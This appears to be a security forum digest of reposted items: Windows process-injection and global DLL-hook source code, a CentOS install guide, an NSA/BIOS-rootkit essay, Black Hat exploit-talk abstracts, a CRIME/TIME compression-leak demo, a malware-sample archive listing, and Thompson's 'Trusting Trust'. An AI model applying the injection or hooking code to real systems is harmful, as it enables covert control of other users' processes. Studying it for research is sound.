#if !defined PROCESSINFOCLASS
typedef LONG PROCESSINFOCLASS;
#endif

#if !defined PPEB
typedef struct _PEB *PPEB;
#endif

#if !defined PROCESS_BASIC_INFORMATION
typedef struct _PROCESS_BASIC_INFORMATION {
    PVOID Reserved1;
    PPEB PebBaseAddress;
    PVOID Reserved2[2];
    ULONG_PTR UniqueProcessId;
    PVOID Reserved3;
} PROCESS_BASIC_INFORMATION;
#endif

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

typedef NTSTATUS (WINAPI * PFN_ZWQUERYINFORMATIONPROCESS)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);

/* Function pointers filled in by main() via GetProcAddress */
NTSTATUS (__stdcall *ZwQueryInformationProcess)(
    HANDLE ProcessHandle,
    PROCESSINFOCLASS ProcessInformationClass,
    PVOID ProcessInformation,
    ULONG ProcessInformationLength,
    PULONG ReturnLength OPTIONAL
);

NTSTATUS (__stdcall *ZwCreateSection)(
    PHANDLE SectionHandle,
    ACCESS_MASK DesiredAccess,
    PDWORD ObjectAttributes OPTIONAL,
    PLARGE_INTEGER MaximumSize OPTIONAL,
    ULONG SectionPageProtection,
    ULONG AllocationAttributes,
    HANDLE FileHandle OPTIONAL
);

NTSTATUS (__stdcall *ZwMapViewOfSection)(
    HANDLE SectionHandle,
    HANDLE ProcessHandle,
    OUT PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    SIZE_T CommitSize,
    PLARGE_INTEGER SectionOffset,
    PSIZE_T ViewSize,
    DWORD InheritDisposition,
    ULONG AllocationType,
    ULONG Win32Protect
);

NTSTATUS (__stdcall *ZwUnmapViewOfSection)(
    HANDLE ProcessHandle,
    PVOID BaseAddress
);
[/code]

So for the p0c I just put an INT3 at the entry point of lsass.exe, and here is the result:

[h=2]Conclusion[/h]
This method is really fun because it doesn't use SetThreadContext() to update eip before resuming thread execution.

Source: w4kfu's bl0g
  8. [h=1]Analyzing Unknown Malware[/h]
[h=3]#1 Dropper of kernel-mode stealer[/h]
[h=3]#Offtopic The case of the gethostbyname() exception[/h]
[h=3]#2 Disclosure of an interesting Botnet - The Executable (Part 1)[/h]
[h=3]#2 Disclosure of an interesting Botnet - The Server (Part 2)[/h]
[h=3]#3 Disclosure of another 0day malware - Initial Dropper and Downloader (Part 1)[/h]
[h=3]#3 Disclosure of another 0day malware - Analysis of 2nd Dropper and 3rd Dropper (Part 2)[/h]
[h=3]#3 Disclosure of another 0day malware - Analysis of the final Payload (Part 3)[/h]
[h=3]#3 Disclosure of another 0day malware - Update and Additional Information[/h]
[h=3]#4 Analysis of an uncommon Downloader[/h]
[h=3]#5 South Korea Incident - New Malware samples[/h]
[h=3]#6 South Korea Incident - Analysis of a tiny Downloader[/h]
[h=3]#7 Brief description of a signed Adware/PUP Downloader[/h]
[h=3]#8 Back to the future - Analysis of an old Downloader[/h]

Sursa: Analyzing Unknown Malware
  9. Blackhat Eu 2013 - Hacking Video Conferencing Systems Description: High-end videoconferencing systems are widely deployed at critical locations such as corporate meeting rooms or boardrooms. Many of these systems are reachable from the Internet or via the telephone network while in many cases the security considerations are limited to the secure deployment and configuration. We conducted a case study on Polycom HDX devices in order to assess the current state of security on those devices. After analyzing the software update file format and showing how to get system level access to the otherwise closed devices we describe how to setup a proper vulnerability development environment which lays the groundwork for future security research. We demonstrate the feasibility of remotely compromising Polycom HDX devices over the network by implementing an exploit for one of the vulnerabilities we identified in the H.323 stack of the current software version which allows us to compromise even firewalled devices as long as the H.323 port is reachable. Our attack does not require the auto-answer feature for incoming calls to be turned on. We conclude with some thoughts about post-exploitation and describe possible ways to control attached peripherals such as the video camera and microphone which could be used to build a surveillance rootkit. For More Information please visit : - Black Hat | Europe 2013 - Briefings Sursa: Blackhat Eu 2013 - Hacking Video Conferencing Systems
  10. [h=1]Creating Global Api Hook Using Windows Hook[/h]
[h=3]zwclose7[/h]

Windows hooks allow you to inject a DLL into all GUI processes that are running in the same session. This allows you to inject a hook DLL into most running processes. Windows hooks can't inject a DLL into system processes or service processes. I have just written a hook DLL to show you how to use a Windows hook to inject a DLL into GUI processes. The DLL has an exported function, SetHook. Use the rundll32 tool to execute this function. Once the function is executed, it sets the Windows hook and injects the DLL into all GUI processes. When the DLL is injected, it hooks the InternetConnectW function to block all websites that contain the word "google" in the URL.

To install the hook using the rundll32 tool, use the following command line:

rundll32 <DllPath>,SetHook

When the rundll32.exe process is terminated, the Windows hook is removed, and the hooked InternetConnectW is also unhooked. I am using my API hooking header for this project.
#include <stdio.h>
#include <Windows.h>
#include <WinInet.h>
#include "apihook.h"

typedef HINTERNET (WINAPI *pInternetConnectW)(HINTERNET, LPCWSTR, INTERNET_PORT, LPCWSTR, LPCWSTR, DWORD, DWORD, DWORD_PTR);

pInternetConnectW fnInternetConnectW;   // original InternetConnectW, saved by the API hook
HINSTANCE hInst;                        // this DLL's module handle, needed by SetWindowsHookEx
API_HOOK Hook;

// WH_CALLWNDPROC hook procedure. It only forwards the message; its real job is
// to make Windows load this DLL into every GUI process of the session.
extern "C" __declspec(dllexport) LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    return CallNextHookEx(NULL, nCode, wParam, lParam);
}

// Exported entry point called via rundll32. The hook lives as long as this
// process does, hence the infinite sleep.
extern "C" __declspec(dllexport) void SetHook()
{
    SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, hInst, 0);
    Sleep(INFINITE);
}

// Replacement for InternetConnectW: refuse any server name containing "google".
HINTERNET WINAPI HookInternetConnectW(HINTERNET hInternet, LPCWSTR ServerName, INTERNET_PORT InternetPort, LPCWSTR UserName, LPCWSTR Password, DWORD dwService, DWORD dwFlags, DWORD_PTR dwContext)
{
    if (ServerName && wcsstr(ServerName, L"google"))
    {
        OutputDebugString("Your request to access Google has been denied!");
        SetLastError(ERROR_ACCESS_DENIED);
        return NULL;
    }
    return fnInternetConnectW(hInternet, ServerName, InternetPort, UserName, Password, dwService, dwFlags, dwContext);
}

BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpReserved)
{
    char szModuleName[260], str[1024];
    hInst = hModule;
    switch (dwReason)
    {
    case DLL_PROCESS_ATTACH:
        GetModuleFileName(NULL, szModuleName, 260);
        sprintf(str, "Hook DLL loaded into process %s (%d)", szModuleName, GetCurrentProcessId());
        OutputDebugString(str);
        InitAPIHook(&Hook, "wininet.dll", "InternetConnectW", HookInternetConnectW);
        fnInternetConnectW = (pInternetConnectW)Hook.OrigFunction;
        StartAPIHook(&Hook);
        break;
    case DLL_PROCESS_DETACH:
        UnhookAPIHook(&Hook);
        RemoveAPIHook(&Hook);
        break;
    }
    return TRUE;
}

[h=4]Attached Files[/h]
WindowsHook.zip (270.07KB)

Sursa: Creating Global Api Hook Using Windows Hook - Source Codes - rohitab.com - Forums
  11. [h=3]CentOS 6.4 Linux Installation Guide Step by Step[/h]

Overview: This tutorial will help system administrators install CentOS 6.4 Linux on servers. CentOS (Community Enterprise Operating System) is a Linux distribution that attempts to provide a free, enterprise-class computing platform with 100% binary compatibility with its upstream source, Red Hat Enterprise Linux (RHEL).

Note: First download the ISO files (http://centos.mirror.net.in/centos/6.4/isos/x86_64/) for your server's architecture and write the ISO file to a DVD.

Installation Steps:

Step 1: Set your server's BIOS to boot from CD/DVD. Select the "Install or Upgrade existing system" option as shown below:
Step 2: Select "Skip" for the media test.
Step 3: Click Next on the welcome screen as shown below.
Step 4: Select English and click Next.
Step 5: Select the appropriate keyboard (U.S. English in my case). Click Next.
Step 6: Select the "Basic Storage Devices" option if you want to install the OS locally on an attached hard disk. Click Next.
Step 7: Select the "Yes, discard any data" option as shown below.
Step 8: Set the hostname and click "Configure Network" if you want to configure the network during installation.
Step 9: Select the time zone for your region. Click Next.
Step 10: Set the root password. Click Next.
Step 11: Select the install type; in my case I am using "Use All Space". If you want to create your own partition table, select the "Create Custom Layout" option. Click Next.
Step 12: Verify the partition scheme and click Next.
Step 13: Click "Format".
Step 14: Click "Write changes to disk".
Step 15: Set the bootloader options. Click Next.
Step 16: Select the software you want to install; in my case I am using "Basic Server". Click Next. Note: If you want to select the software manually, click "Customize Now" and select your respective packages.
Step 17: Installation started, as shown below.
Step 18: Installation completed. Reboot your server now.
Step 19: Welcome login screen (run level 3). Enter the user as root and enter the password.

Sursa: CentOS 6.4 Linux Installation Guide Step by Step
  12. Forwarded from: Marjorie Simmons <lawyer (at) marjoriesimmonsesq.com> A Friday muse for the equinox: As everyone not living under a rock now knows, the NSA is an APT (advanced persistent threat): "[t]hrough covert partnerships with tech companies, the spy agencies have inserted secret vulnerabilities into encryption software." http://www.theguardian.com/world/2013/sep/05/nsa-gchq-encryption-codes-security According to the materials The Guardian published online, in one of the briefings between the NSA and GCHQ to "celebrate their success at 'defeating network security and privacy'", the NSA's material states: "For the past decade, NSA has lead an aggressive, multi-pronged effort to break widely used Internet encryption technologies". The 'multi-pronged' language makes sense, since traditionally one doesn't simply rely on a single avenue of attack in an effort to undermine an enemy. So, in raping the sacred cow of crypto, what might one of the prongs be? What's least path of resistance? I had a recent reason to think about that, and decided on the BIOS. A while back I was close to someone who turned out to be a conspiracy-theorist, (and I had quite enough of that, thank you very much), but there are instances when the adage that "just because you're paranoid doesn't mean they're not out to get you" has a certain ring of truth to it. (I imagine all the conspiracy-theorists threw a "there is a god!" party when The Guardian published the recent news.) In the last few weeks I was offered a BIOS update for an x64 i7 notebook built in 2011 which runs Windows 7. The BIOS is set up to optionally use UEFI (Unified Extensible Firmware Interface) boot mode, which on this machine is disabled by default. 
It also has an option for enabling Intel's AMT (Active Management Technology), which is enabled by default and has an option to disable it, but no option to enable or disable the similar and dependent Computrace/LoJack anti-theft functions that are also burned into BIOS by the manufacturer. I knew this machine had the LoJack modifications to the BIOS chip because the hardware manufacturer's security software offers the use of LoJack within security setup once the user is already within the OS. Given the well-documented security threat that LoJack presents, one wants to disable it but cannot do so easily as one can with the precursor AMT, which is (or at least appears to be) more transparent. You never know though: Researchers can slip an undetectable trojan into Intel's Ivy Bridge CPUs, http://arstechnica.com/security/2013/09/researchers-can-slip-an-undetectable-trojan-into-intels-ivy-bridge-cpus/. For those unaware, the Computrace/LoJack product is anti-theft tracking software that periodically connects to Absolute Software's servers (the makers/licensors of LoJack) to announce its location and to check to see if the machine has been reported stolen. It can report such things, besides georeferencing, as installed software and encryption status, and perform file retrieval. (http://www3.absolute.com/Shared/Datasheets/CT-MX-E.sflb.ashx) The smart people who hacked it show how it can be reconfigured to further undesirable ends, see Deactivate the rootkit - Black Hat Vegas 2009 - Exploiting Stuff: http://web.archive.org/web/20120316214910/http://exploiting.wordpress.com/2009/09/11/138/, and The BIOS-Embedded Anti-Theft Persistent Agent that Couldn't: Handling the Ostrich Defense - Core Security Technologies http://web.archive.org/web/20120226125347/http://blog.coresecurity.com/2009/08/11/the-bios-embedded-anti-theft-persistant-agent-that-couldnt-response-handling-the-ostrich-defense/. 
LoJack (and some of its competitors' products, of which there aren't many) comes preinstalled in the BIOS of Acer, Asus, Dell, Fujitsu, Gateway, HP, Lenovo, Panasonic, Samsung, and Toshiba machines, among others, (product partners with model numbers are listed at http://www.absolute.com/en/partners/bios-compatibility.aspx, Intel's anti-theft partners for consumer machines, including LoJack, are at http://www.intel.com/content/www/us/en/architecture-and-technology/anti-theft/anti-theft-service-providers.html and for business, including Computrace, are at http://www.intel.com/content/www/us/en/architecture-and-technology/anti-theft/anti-theft-service-providers-enterprise.html; notebook models supported are listed in http://www.intel.com/content/dam/www/public/us/en/documents/datasheets/anti-theft-tested-platforms-support-datasheet.pdf). While it wouldn't make economic sense for Absolute to track a machine whose owner hasn't paid the licensing fee, any rootkit exploiting LoJack's weaknesses in the BIOS implementation would find it a neat way to own a machine while bypassing all OS-level protections, directing in-and-outbound traffic through servers of their choice. I'm confident the BIOS geeks at the NSA are tickled pink with it and are all up in its stuff, especially given the documented ownability of it -- because it makes codebreaking unnecessary. Fifteen years ago the Chernobyl virus targeted systems' BIOS, causing an estimated $1 billion US dollars in commercial damages alone; as for Stuxnet, though eschewing the BIOS in favor of a badass PLC, who knows its ultimate costs? The damage that an effective rootkit using BIOS or targeting chipsets could do, now, is staggering, when you think about it. There's been plenty of time for the NSA to consider the possibilities, and plenty of incentive given the demographic of millions of Computrace/LoJack-affected machines lying in wait for the cloak and dagger crowd to work their magic. 
LoJack is enabled on notebooks by default, currently working through architecture like Intel's AMT, and stays 'dormant' until one purchases a license for it (I didn't), at which point Absolute's software will instruct the affected BIOS to copy an existing downloader from the BIOS flash ROM (usually named rpcnetp.exe) to %WINDIR%\System32; on some machines rpcnetp.exe is preinstalled with the OS on the unit's hard drive prior to shipment from the factory. When activated, rpcnetp.exe downloads the agent rpcnet.exe and installs it as a service. The enable/disable state of the persistence module is stored in a part of the BIOS that cannot be flashed to remove it, and in this way provides a no-touch method for it being a primary and persistent threat tool if it is compromised. (http://www.absolute.com/en/resources/faq/absolute-computrace-technology). Presumably, disabling AMT disables the vehicle which drives the LoJack functions, but since Intel's Ivy Bridge has already been compromised, LoJack could still jack a box with a compromised Ivy Bridge even if it or AMT is showing "disabled" in a BIOS. UEFI, a specification defining a software interface between an operating system and platform firmware, at the same time offers an architecture to build better security but also presents a common base for targeting attacks. (Analysis of the building blocks and attack vectors associated with the UEFI, https://www.sans.org/reading-room/whitepapers/services/analysis-building-blocks-attack-vectors-unified-extensible-firmware-34215?show=analysis-building-blocks-attack-vectors-unified-extensible-firmware-34215&cat=services.) UEFI has many detractors because it takes control of the machine out of the hands of its owner; for instance, Ronald Minnich (co-author of coreboot) and Cory Doctorow have continually criticized EFI as an attempt to remove the ability of a computer's owner to truly control it. 
(https://archive.fosdem.org/2007/interview/ronald+g+minnich) Of course, for Windows 8, Microsoft's certification requirements require that computers' firmware implement UEFI, and if they support 'Connected Standby' in Windows 8, then the firmware isn't allowed to contain a compatibility mode, so systems supporting connected standby are not capable of booting 'legacy' BIOS-type operating systems: "An OEM may not ship a 64-bit system which defaults to legacy BIOS or loads legacy option ROMs if that system ships with a UEFI-compatible OS", nor can they indicate connectivity in standby mode: "Systems that support Connected Standby must not include a light indicating the status of the radios in the system", (ostensibly in order to conserve energy); and a "LAN device on systems that support Connected Standby must deliver reliable connectivity in Connected Standby" because "[t]he intent of a system that supports connected standby is that it is always connected to the cloud, whether the system is fully powered or in connected standby". (http://web.archive.org/web/20120802023617/http://msdn.microsoft.com/en-us/library/windows/hardware/jj128256.aspx) I'm confident the UEFI programmers at the NSA are delighted about this, because if they can compromise a Windows 8 machine running Computrace/LoJack, they can perform I/O operations while the machine is in connected standby with no indication to the user or to OS-dependent anti-malware programs of their traffic. So I look at this machine and then at my Linux machines and think it really is past time to ditch Windows entirely, but I need to use it because clients use Windows software that I can't run under Wine, and I can't pry them off Windows, though I've tried. Linux though, is also vulnerable to pre-OS attacks in a similar way. This machine also has, like my Linux AMD boxes, a BIOS option of using ACPI (Advanced Configuration and Power Interface) for SATA. 
ACPI has its own high-level interpreted language that can readily be used to code a rootkit and store key attack functions in the BIOS. Six years ago John Heasman documented this in his presentation at LayerOne on BIOS rootkits. (Researchers: Rootkits headed for BIOS, http://web.archive.org/web/20080724122321/http://www.securityfocus.com/news/11372 and see his presentation.) Heasman also presented at BlackHat the same year, Hacking the Extensible Firmware Interface, http://web.archive.org/web/20091211100105/http://www.ngssoftware.com/research/papers/BH-VEGAS-07-Heasman.pdf. (See also Persistent BIOS infection at CanSecWest 2009 http://exploiting.wordpress.com/2009/03/23/cansecwest-was-great-here-the-presentation-slides/ and http://www.theregister.co.uk/2009/03/24/persistent_bios_rootkits/.) Although ACPI is a platform-independent open technology standard, its implementation is most often closed source, and with the 'covert partnerships' the NSA has a history of making with vendors, I'm confident the NSA's ACPI programmers are seeing what they can make of ACPI's usefulness even in its basic features, including in Linux, such as elevating privileges and reading physical memory, using their own procedures that replace legitimate functions stored in flash memory, and other such treats. (See, Researcher creates proof-of-concept malware that infects BIOS, network cards, http://www.cso.com.au/article/432041/researcher_creates_proof-of-concept_malware_infects_bios_network_cards/, What You Need to Know About Linux Rootkits, http://www.linuxsecurity.com/content/view/154709/171/; and, Ultimate PC security requires UEFI -- and Windows 8 or Linux, http://www.infoworld.com/d/security/ultimate-pc-security-requires-uefi-and-windows-8-or-linux-215048.) Because through all the usual and some creative means I wasn't able to update the BIOS on this machine, the situation occasioned a call to the vendor's support line and ultimately they decided the machine needed a new motherboard. 
Though I told the (major market-player) vendor I wanted a board without the LoJack mods to the BIOS, they said they would try but couldn't guarantee I'd get a clean board. This was like reminding them the machine is still under warranty so they must provide a new board and not a remanufactured one, and they say, "We'll try ...". I sigh realizing that Linux or Windows or Mac, it doesn't matter. Without an easy and timely method to hash a BIOS for everyone to make sure it hasn't been modified with unwanted instructions, and without open source hardware industry standards that are implemented as a matter of course in a transparent manner, the NSA and its far flung equivalents will continue to be an advanced persistent threat and all our BIOS is belong to them.
  13. Blackhat Eu 2013 - A Perfect Crime? Only Time Will Tell

Description: In 2012, security researchers shook the world of security with their CRIME attack against the SSL encryption protocol. The CRIME (Compression Ratio Info-leak Made Easy) attack used an inherent information leak caused by HTTP compression to defeat SSL's encryption. However, the CRIME attack had two major practical drawbacks. The first is the attack threat model: a CRIME attacker must control the plaintext AND be able to intercept the encrypted message. This attack model limits the attack mostly to MITM (Man In The Middle) situations. The second issue is that the CRIME attack was aimed solely at HTTP requests. However, most of the current web does not compress HTTP requests. The few protocols that did support HTTP request compression (SSL compression and SPDY) dropped their support after the attack details were disclosed, thus rendering the CRIME attack irrelevant. In our work we address these two limitations by introducing the TIME (Timing Info-leak Made Easy) attack for HTTP responses. By using timing information differential analysis to infer the compressed payload's size, the CRIME attack's attack model can be simplified and its requirements can be loosened. In TIME's attack model the attacker only needs to control the plaintext, theoretically allowing any malicious site to launch a TIME attack against its innocent visitors, to break SSL encryption and/or Same Origin Policy (SOP). Changing the target of the attack from HTTP requests to HTTP responses significantly increases the attack surface, as most of the current web utilizes HTTP response compression to save bandwidth and latency. 
In particular, we:
- Introduce the TIME attack
- Show an actual POC of timing differential analysis to infer the compressed payload's size and subsequently the ciphertext's underlying plaintext
- Show the relevancy of compression ratio information leakage for HTTP responses
- Suggest mitigation steps against the TIME attack

For More Information please visit : - Black Hat | Europe 2013 - Briefings

Sursa: Blackhat Eu 2013 - A Perfect Crime? Only Time Will Tell
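The size leak that CRIME and TIME rely on, as an added example (not from the talk or its authors): a constructed response reflects attacker-chosen text next to a constructed secret, zlib compresses it, and the candidate equal to the secret yields the smallest output; length padding is shown as the partial mitigation it is.

```python
import zlib

# Constructed demo values; the real attack targets a browser and server, not these strings.
SECRET_TOKEN = "sessionid=7f3a9c1d2e5b8a"   # secret the server embeds in every response
BUCKET = 128                                # padding granularity for the mitigation below


def build_response(reflected: str, secret: str = SECRET_TOKEN) -> bytes:
    """Constructed HTTP-style body: attacker-chosen text reflected next to a secret."""
    return f"<p>Hello {reflected}</p><!-- {secret} -->".encode()


def compressed_length(body: bytes) -> int:
    """Length of the compressed body; TIME recovers this indirectly from timing."""
    return len(zlib.compress(body, 9))


def rank_candidates(candidates: list[str]) -> list[tuple[int, str]]:
    """Order candidate secrets by the compressed size they produce when reflected.

    A candidate that equals (or shares a longer prefix with) the real secret is
    deduplicated by DEFLATE's LZ77 stage, so the body shrinks: the smallest
    size points at the correct guess. That is the compression-ratio info-leak.
    """
    return sorted((compressed_length(build_response(c)), c) for c in candidates)


def padded_length(body: bytes, bucket: int = BUCKET) -> int:
    """Mitigation: round the compressed length up to a fixed bucket before encryption.

    Padding only hides differences that stay inside one bucket, so it reduces
    the leak rather than removing it. Not compressing secret-bearing responses,
    or never mixing attacker input and secrets in one compressed message, is
    the robust fix.
    """
    n = compressed_length(body)
    return -(-n // bucket) * bucket


def leak_demo() -> dict:
    """Rank three same-length candidates and report how padding masks the gap."""
    candidates = [
        "sessionid=0a1b2c3d4e5f60",   # wrong: shares only the "sessionid=" prefix
        "sessionid=7f3a9c1d2e5b8a",   # correct
        "sessionid=9e8d7c6b5a4f31",   # wrong
    ]
    ranked = rank_candidates(candidates)
    best_size, best_guess = ranked[0]
    return {
        "best_guess": best_guess,
        "size_gap": ranked[-1][0] - best_size,
        "padded_sizes": sorted({padded_length(build_response(c)) for c in candidates}),
    }


if __name__ == "__main__":
    print(leak_demo())
```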
  14. [h=1]3D-Printed Robot Cracks Your Android PIN Code[/h] Using a PIN to lock your Android phone will keep it safe from most people, but not from R2B2 — a robot designed to brute-force its way through any four-digit code in less than a day. R2B2, the Robotic Reconfigurable Button Basher, is the invention of Justin Engler — a senior security engineer at New York-based iSEC Partners. The robot has debuted on YouTube in advance of its appearance at the Black Hat security conference in Las Vegas. Instead of using sophisticated software to crack Android PINs, R2B2 adopts the tried-and-true method of entering every possible combination until something clicks. In hacking, this method is known as a "brute-force" attack, but R2B2 is unique in that it exhibits brute-force behavior in real life rather than digitally. The robot — four yellow manipulators that control a central appendage, resting atop two "legs" — can sit atop an Android phone and simply press buttons over and over again. There are 10,000 possible four-digit PINs — a relatively small number, but still too many for one human to work through. R2B2, on the other hand, has no need for food, sleep or mental stimulation, and can work through every possible PIN in just 20 hours. If a user enters five incorrect PINs in a row, the Android OS enforces a 30-second waiting period before the person can try again — but that is the only disincentive. This is why R2B2 wouldn't work on iOS devices: Apple employs an iterative system that makes a user wait increasingly longer to retry after each incorrect PIN entry. You can actually create your own R2B2, if you want. The robot is the result of open-source software, a few cheap electronics and a standard MakerBot 3D printer, reports Forbes. In fact, apart from the electronic components, the entire robot was 3D-printed. The robot's legs, central stand and "finger" apparatus all came from a 3D printer. 
Engler plans to release all of his blueprints within the next few weeks, which means that anyone in need of a neat party trick can print and cobble together his or her own R2B2. Though R2B2 is a novel device, it doesn't pose much of a security risk. No one is likely to leave his or her Android phone beneath a very distinctive robot for 20 hours straight, and even if someone did, the robot wouldn't be able to inflict any harm because all it can do is guess PINs. What R2B2 does demonstrate, though, is that PINs aren't a foolproof security measure, especially compared to pattern- and password-based methods. Additionally, Android could take a page out of the iOS playbook when it comes to locking out potential malefactors. Image: Mashable This article originally published at TechNewsDaily here Sursa: 3D-Printed Robot Cracks Your Android PIN Code
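To make the article's comparison concrete, an added example (not from the article or from iSEC Partners) models how long a button-pressing brute force needs under the fixed 30-second lockout the article describes versus a hypothetical escalating lockout; the 1.2 s per attempt is an assumption chosen so the fixed model reproduces the article's 20 hours.

```python
from typing import Callable

# Figures from the article: 10,000 four-digit PINs, a 30 s lockout after every
# 5 wrong entries, about 20 hours for a full sweep. The per-attempt time is an
# assumption picked so the fixed-delay model lands on those 20 hours.
PIN_SPACE = 10_000
FAILURES_PER_LOCKOUT = 5
ATTEMPT_SECONDS = 1.2
MAX_LOCKOUT_SECONDS = 3600.0   # hypothetical cap for the escalating policy


def fixed_delay(lockout_number: int) -> float:
    """The Android behaviour the article describes: always 30 s, never escalating."""
    return 30.0


def escalating_delay(lockout_number: int) -> float:
    """Hypothetical escalating policy in the spirit of iOS: doubles from 30 s, capped."""
    exponent = min(lockout_number - 1, 20)   # keep the float power bounded
    return min(30.0 * 2.0 ** exponent, MAX_LOCKOUT_SECONDS)


def worst_case_seconds(policy: Callable[[int], float]) -> float:
    """Time to exhaust the PIN space: every attempt plus every lockout delay.

    In the worst case the correct PIN comes last, so the PIN_SPACE - 1
    failures before it trigger all the lockouts.
    """
    lockouts = (PIN_SPACE - 1) // FAILURES_PER_LOCKOUT
    total = PIN_SPACE * ATTEMPT_SECONDS
    for k in range(1, lockouts + 1):
        total += policy(k)
    return total


def pins_tried_within(policy: Callable[[int], float], budget_seconds: float) -> int:
    """How many distinct PINs can be tried before the time budget runs out."""
    elapsed, tried, lockouts = 0.0, 0, 0
    while tried < PIN_SPACE and elapsed + ATTEMPT_SECONDS <= budget_seconds:
        elapsed += ATTEMPT_SECONDS
        tried += 1
        if tried % FAILURES_PER_LOCKOUT == 0:
            lockouts += 1
            elapsed += policy(lockouts)
    return tried


def hours(seconds: float) -> float:
    return seconds / 3600.0


if __name__ == "__main__":
    for name, policy in (("fixed 30 s", fixed_delay), ("escalating", escalating_delay)):
        print(f"{name}: full sweep {hours(worst_case_seconds(policy)):.1f} h, "
              f"{pins_tried_within(policy, 20 * 3600)} PINs in 20 h")
```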
  15. Nytro

    Fun stuff

    I found out how the NSA monitors everyone. http://www.southparkstudios.com/full-episodes/s17e01-let-go-let-gov So simple and so effective...
  16. Malware archives

[h=3]Warning! Warning! Warning! Warning! Warning![/h]

Malware samples are available for download by any responsible whitehat researcher. By downloading the samples, anyone waives all rights to claim punitive, incidental and consequential damages resulting from mishandling or self-infection. If you do not know what you are doing here, it is recommended you leave right away. This page has no commercial purpose. Contact me via email for the passwords (specifying all or a single archive). If you see errors, typos, etc., please let me know.

[h=3]Notes about the collection of binaries[/h]

Honeypot ISP: AS3269 Interbusiness (Telecom Italia)
Honeypot software: amun, dionaea
Total files: 7085
Period of time: Aug 2009 - Feb 2013
Type of files: ASCII, data, HTML, MS-DOS, PE32 (dll, gui, Mono/.Net)

Archive                        List            #    Download  Size
nothink-malware-archive-0.zip  list-md5-0.txt  445  link      50M
nothink-malware-archive-1.zip  list-md5-1.txt  411  link      50M
nothink-malware-archive-2.zip  list-md5-2.txt  456  link      60M
nothink-malware-archive-3.zip  list-md5-3.txt  440  link      58M
nothink-malware-archive-4.zip  list-md5-4.txt  421  link      62M
nothink-malware-archive-5.zip  list-md5-5.txt  456  link      57M
nothink-malware-archive-6.zip  list-md5-6.txt  485  link      69M
nothink-malware-archive-7.zip  list-md5-7.txt  441  link      59M
nothink-malware-archive-8.zip  list-md5-8.txt  449  link      63M
nothink-malware-archive-9.zip  list-md5-9.txt  466  link      63M
nothink-malware-archive-a.zip  list-md5-a.txt  437  link      56M
nothink-malware-archive-b.zip  list-md5-b.txt  427  link      64M
nothink-malware-archive-c.zip  list-md5-c.txt  448  link      59M
nothink-malware-archive-d.zip  list-md5-d.txt  435  link      51M
nothink-malware-archive-e.zip  list-md5-e.txt  441  link      51M
nothink-malware-archive-f.zip  list-md5-f.txt  427  link      57M

Sursa: Nothink.org
  17. Browser Pivoting (Two-Factor Auth? Hah!) Description: A Browser Pivot is a way to inherit a user's access to sites by relaying requests through their browser. This man-in-the-browser capability gives pen testers a way to go around 2FA and demonstrate risk--even in high security environments. Browser Pivoting - Cobalt Strike Sursa: Browser Pivoting (Two-Factor Auth? Hah!)
  18. Blackhat Eu 2013 - Advanced Heap Manipulation In Windows 8

Description: With the introduction of Windows 8, previously publicly known heap/kernel pool overflow exploitation techniques are dead because of exploit mitigation improvements. There are indications that compromising application-specific data, which is facilitated by heap manipulation, is getting more popular for future exploitation. How can the heap state be predicted deterministically to the greatest possible degree? The traditional manipulation technique (for both kernel pool and user heap) is to consistently defragment the heap so that future allocations become adjacent, and then make holes in these allocations to let the vulnerable buffer, which has a similar size, fall into one of them. In the user heap a new LFH allocator was introduced; its randomized alloc/free and guard pages made this technique tough to make work. Beyond that, the traditional technique has some limitations, such as the size of the vulnerable buffer and the type of data structure that can be chosen as the attack target (especially in the kernel pool), which together mean it can no longer be considered a generic solution. This talk aims to provide an advanced method for precisely manipulating heap layout (kernel pool and user heap) by standing on the giant's shoulders: "Heap Feng Shui". Arbitrarily sized vulnerable buffers can be covered with our more generic method, which paves the way toward further interesting discoveries for security researchers. A reliable demo will be explained at the end of this section. By setting up the heap in a controlled state, some specific vulnerability scenarios can be exploited easily and reliably. In the following practical sections, this talk will be divided into two parts:

1: Kernel pool: I will show how to plant a desired kernel object at a fixed known address, and then demo an exploit against write-what-where vulnerability scenarios. Furthermore, some attacks which need sufficient control of the kernel pool and precise size information (e.g. the "block size attack" presented by Tarjei in his BH USA 2012 talk) may utilize this research. I will also show how a carefully crafted kernel pool layout combined with application data corruption can lead to a reliable exploit in kernel pool overflow scenarios.

2: User heap: I will discuss the possibility of heap determinism in the Windows 8 user heap, and use a demo to prove that reliable heap exploitation is still achievable in some circumstances with proper heap layout crafting.

Presented By: Zhenhua 'Eric' Liu

For More Information please visit : - Black Hat | Europe 2013 - Briefings

Sursa: Blackhat Eu 2013 - Advanced Heap Manipulation In Windows 8
  19. Ken Thompson's "cc hack" - Presented in the journal Communications of the ACM, Vol. 27, No. 8, August 1984, in a paper entitled "Reflections on Trusting Trust", Ken Thompson, co-author of UNIX, recounted a story of how he created a version of the C compiler that, when presented with the source code for the "login" program, would automatically compile in a backdoor to allow him entry to the system. This is only half the story, though. In order to hide this trojan horse, Ken also added to this version of "cc" the ability to recognize if it was recompiling itself, to make sure that the newly compiled C compiler contained both the "login" backdoor and the code to insert both trojans into a newly compiled C compiler. In this way, the source code for the C compiler would never show that these trojans existed.

Reflections on Trusting Trust
by Ken Thompson

Introduction

I thank the ACM for this award. I can't help but feel that I am receiving this honor for timing and serendipity as much as technical merit. UNIX swept into popularity with an industry-wide change from central main frames to autonomous minis. I suspect that Daniel Bobrow (1) would be here instead of me if he could not afford a PDP-10 and had had to "settle" for a PDP-11. Moreover, the current state of UNIX is the result of the labors of a large number of people.

There is an old adage, "Dance with the one that brought you," which means that I should talk about UNIX. I have not worked on mainstream UNIX in many years, yet I continue to get undeserved credit for the work of others. Therefore, I am not going to talk about UNIX, but I want to thank everyone who has contributed.

